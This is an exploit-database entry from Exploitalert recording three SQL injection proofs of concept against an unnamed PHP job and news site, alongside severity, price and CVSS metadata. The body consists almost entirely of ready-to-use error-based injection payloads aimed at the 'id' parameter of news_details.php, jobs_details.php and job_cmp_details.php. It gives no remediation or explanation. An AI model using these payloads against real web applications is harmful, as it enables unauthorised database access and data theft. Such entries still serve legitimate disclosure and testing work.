Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-89 | $5000 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2019-03-26 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H | 0.039 | 0.7 |
----- PoC 1: SQLi ----- Request: http://localhost/[PATH]/news_details.php?id=1 Vulnerable Parameter: id (GET) Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN (5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING MIN(0)# ----- PoC 2: SQLi ----- Request: http://localhost/[PATH]/jobs_details.php?id=1 Vulnerable Parameter: id (GET) Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN (5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING MIN(0)# ----- PoC 3: SQLi ----- Request: http://localhost/[PATH]/job_cmp_details.php?id=1 Vulnerable Parameter: id (GET) Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN (5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.